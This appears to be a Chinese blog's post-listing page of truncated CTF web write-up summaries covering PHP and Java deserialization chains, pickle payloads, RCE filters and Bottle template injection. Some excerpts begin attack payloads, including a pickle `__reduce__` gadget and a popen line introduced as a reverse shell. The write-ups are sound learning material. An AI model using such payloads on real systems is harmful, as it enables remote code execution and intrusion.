摘要: 23质量比24高我只能说 easy php 简单反序列化 __debuginfo()魔术方法打印所需调试信息,反序列化时候执行! 链子如下: BBB::__debuginfo()->CCC::__toString()->AAA::__call() AI运行代码 php EXP: <?php high 阅读全文
posted @ 2025-10-17 08:58 Echair 阅读(15) 评论(0) 推荐(0)
摘要: rce `<?php echo "get只接受code欧,flag在上一级目录<br>"; $filename = __FILE__; highlight_file($filename); if(isset($_GET['code'])){ if (!preg_match('/session_id\ 阅读全文
posted @ 2025-10-17 08:55 Echair 阅读(22) 评论(0) 推荐(0)
摘要: CC1 反序列化嘛肯定从终点类开始找 入口类 先来看一个接口 /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTIC 阅读全文
posted @ 2025-08-20 15:07 Echair 阅读(20) 评论(2) 推荐(1)
摘要: 月更博主了真的最近在忙着做取证,你别说学了点java对java站上手就是快。废话了哈 看看题目 映入的是经典java index 就知道是springboot的东西了 依旧去找控制器也就是所谓的入口 package gdufs.challenge.web.controller; import gdu 阅读全文
posted @ 2025-07-17 22:05 Echair 阅读(35) 评论(0) 推荐(1)
摘要: openharmony ctf web1 其实就是打的逻辑漏洞 php的但是卡了很久在那个.htaccess后面发现是没啥用的来看 登录框处弱口令 user password123 爆破二级目录 secrettttts得到 token.txt 发现鉴权脚本 生成auth_token: <?php / 阅读全文
posted @ 2025-06-16 15:53 Echair 阅读(79) 评论(0) 推荐(1)
摘要: 0x00先来点python的一些知识 __globals__ : `__globals__` 是 **函数的内置属性**,用于访问全局变量 __dict__ : `__dict__` 是一个**特殊属性**,用于存储对象(或类)Python 对象的**可写属性集合** __dir__ :`__dir 阅读全文
posted @ 2025-06-16 15:48 Echair 阅读(60) 评论(2) 推荐(1)
摘要: pickle反序列化 python的很多危险来源都是这个pickle pickle时用来序列化和反序列化的 payloads 0 利用cp 覆盖app.py import pickle import base64 import subprocess class A(): def __reduce__ 阅读全文
posted @ 2025-06-16 14:40 Echair 阅读(64) 评论(4) 推荐(1)
摘要: bottle模板框架注入 在simpletemplate框架下支持用%来使用python 代码 本来是bottle框架是会有ssti的 但过滤掉了花括号就可以用这个方法 方法0(单行python反弹) 弹shell: %__import__('os').popen("python3 -c 'impo 阅读全文
posted @ 2025-06-16 14:23 Echair 阅读(183) 评论(3) 推荐(1)